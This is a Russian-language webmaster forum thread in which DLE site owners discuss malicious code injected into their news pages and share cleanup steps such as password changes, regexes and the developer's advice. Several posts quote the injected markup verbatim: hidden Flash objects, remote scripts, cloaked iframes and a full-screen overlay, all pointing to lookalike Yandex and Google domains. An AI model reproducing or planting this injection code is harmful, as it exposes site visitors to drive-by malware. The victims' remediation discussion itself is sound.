оявление постороннего кода в новостях DLE

ST@LKER
На сайте с 27.02.2009
Offline
86
#61
ProLiant:
Значит дело не в нуледе и лицензии. Ломается и то, и то... Проблема не в каком-то модуле. После установки заплатки также ломается. Дело в другой дыре в двиге. И гадать теперь можно долго.

Поменяйте пароли на БД может поможет мне помогло..

ProLiant
На сайте с 07.12.2005
Offline
249
#62
ST@LKER:
Поменяйте пароли на БД может поможет мне помогло..

Да менял на все сразу пароли, в т.ч. и на БД. Пока вроде, с утра, полет нормальный. :) До этого 2 раза зараза возвращалась, несмотря на смены всего...

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
G
На сайте с 03.03.2008
Offline
82
#63

Народ, подскажите регулярку для Notepad++ чтобы можно было почистить это в базе с учетом что там проставлен рандомный параметр в каждую новость (

Вот такое я вижу у себя

<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0\" width=\"1\" height=\"1\"><param name=\"movie\" value=\"http://webmasters-yandex.ru/flash.swf?c4ca4238a0b923820dcc509a6f75849b\"><param name=\"quality\" value=\"high\"/><param name=\"scale\" value=\"exactfit\"><param name=\"bgcolor\" value=\"#FFFFFF\"/><param name=\"AllowScriptAccess\" value=\"always\"/><embed src=\"http://webmasters-yandex.ru/flash.swf?c4ca4238a0b923820dcc509a6f75849b\" width=\"1\" height=\"1\" type=\"application/x-shockwave-flash\" AllowScriptAccess=\"always\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\"></embed></object><script async=\"async\" type=\"text/javascript\" src=\"http://google-webmaster.ru/c4ca4238a0b923820dcc509a6f75849b.js\"></script>

c4ca4238a0b923820dcc509a6f75849b - а вот это всегда разное в новости

Gooodd
На сайте с 02.07.2008
Offline
103
#64

greatreklam, в теме выложен php скрипт, который чистит. Если у кого уже не тег object а тег script , то там в скрипте нужно в 4х местах поменять Object на script

Если ты хочешь, что бы у тебя было всё хорошо. Положи под подушку шоколад и на утро у тебя будет всё в шоколаде!!!
G
На сайте с 03.03.2008
Offline
82
#65
Gooodd:
greatreklam, в теме выложен php скрипт, который чистит. Если у кого уже не тег object а тег script , то там в скрипте нужно в 4х местах поменять Object на script

Пробовал его запустить, но получаю в ответ

Код ошибки: 500
ID
На сайте с 13.11.2011
Offline
33
#66
greatreklam:
Народ, подскажите регулярку для Notepad++ чтобы можно было почистить это в базе с учетом что там проставлен рандомный параметр в каждую новость (
Вот такое я вижу у себя
<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0\" width=\"1\" height=\"1\"><param name=\"movie\" value=\"http://webmasters-yandex.ru/flash.swf?c4ca4238a0b923820dcc509a6f75849b\"><param name=\"quality\" value=\"high\"/><param name=\"scale\" value=\"exactfit\"><param name=\"bgcolor\" value=\"#FFFFFF\"/><param name=\"AllowScriptAccess\" value=\"always\"/><embed src=\"http://webmasters-yandex.ru/flash.swf?c4ca4238a0b923820dcc509a6f75849b\" width=\"1\" height=\"1\" type=\"application/x-shockwave-flash\" AllowScriptAccess=\"always\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\"></embed></object><script async=\"async\" type=\"text/javascript\" src=\"http://google-webmaster.ru/c4ca4238a0b923820dcc509a6f75849b.js\"></script>

c4ca4238a0b923820dcc509a6f75849b - а вот это всегда разное в новости

Для этого необязательно использовать notepad++.

celsoft:
Чтобы удалить весь JS код из новостей, вам нужно в админпанели сделать перестроение публикаций, DLE автоматом удалит этот код, а из статических страниц удалять нужно уже вручную.
A
На сайте с 25.03.2012
Offline
59
#67

Так а кто-то с разработчиком эту проблему обсуждает? Или тут все на нулах и кейгенах? Парни выложили кусочек кода, который якобы должен был помочь... но судя по сообщениям толку от этого мало. Рапартую на счет моих сайтов =)Заражение не повторялось после танцев с барабанами...

ID
На сайте с 13.11.2011
Offline
33
#68
Abrikosik:
Так а кто-то с разработчиком эту проблему обсуждает?

Цитата выше от celsoft`a (разработчика), так что да, обсуждают.

A
На сайте с 25.03.2012
Offline
59
#69
IRONHiDE:
Цитата выше от celsoft`a (разработчика), так что да, обсуждают.

Ну это то я видел еще раньше, да и сам этот код удалить то не проблема, по поводу самой заплатки то тихо...

G
На сайте с 03.03.2008
Offline
82
#70

Ночью все очистил двумя регулярками в Notepad++

<object classid=.+?</object>

и
<script async=.+?</script>

Все пароли поменял, кэши очистил, с утра опять эта зараза сидела на всех страницах...

---------- Добавлено 14.09.2013 в 08:14 ----------

Еще появился вариант с iframe

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="1" height="1">

<param name="movie" value="http://webmasters-yandex.ru/flash.swf?205930577" />
<param name="quality" value="high" />
<param name="scale" value="exactfit" />
<param name="bgcolor" value="#FFFFFF" />
<param name="AllowScriptAccess" value="always" /><embed src="http://webmasters-yandex.ru/flash.swf?1244404735" width="1" height="1" type="application/x-shockwave-flash" allowscriptaccess="always" pluginspage="http://www.macromedia.com/go/getflashplayer"></object>
<div id="start20130914">&nbsp;</div>
<iframe src="http://yandex-webmaster.ru/GYYmkj.cgi?3" style="position: absolute !important; overflow: hidden; clip: rect(1px 1px 1px 1px); clip: rect(1px, 1px, 1px, 1px); width: 660px; height: 267px;"></iframe>
<iframe src="http://statsyandex.ru/hCiERBFx.cgi?3" style="position: absolute !important; overflow: hidden; clip: rect(1px 1px 1px 1px); clip: rect(1px, 1px, 1px, 1px); width: 537px; height: 348px;"></iframe>
<div style="position: fixed; overflow: auto; margin: 0px; left:0; top:0; width: 100%; height: 100%; z-index: 999; background: url('http://webmaster-google.ru/window/bg.png') repeat;">
<iframe src="http://webmaster-google.ru/window/" style="position: absolute; margin-top: -250px; margin-left: -300px; top: 50%; left: 50%; width: 650px; height: 500px; z-index: 1000; border: 0px; overflow: none;"></iframe></div>

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий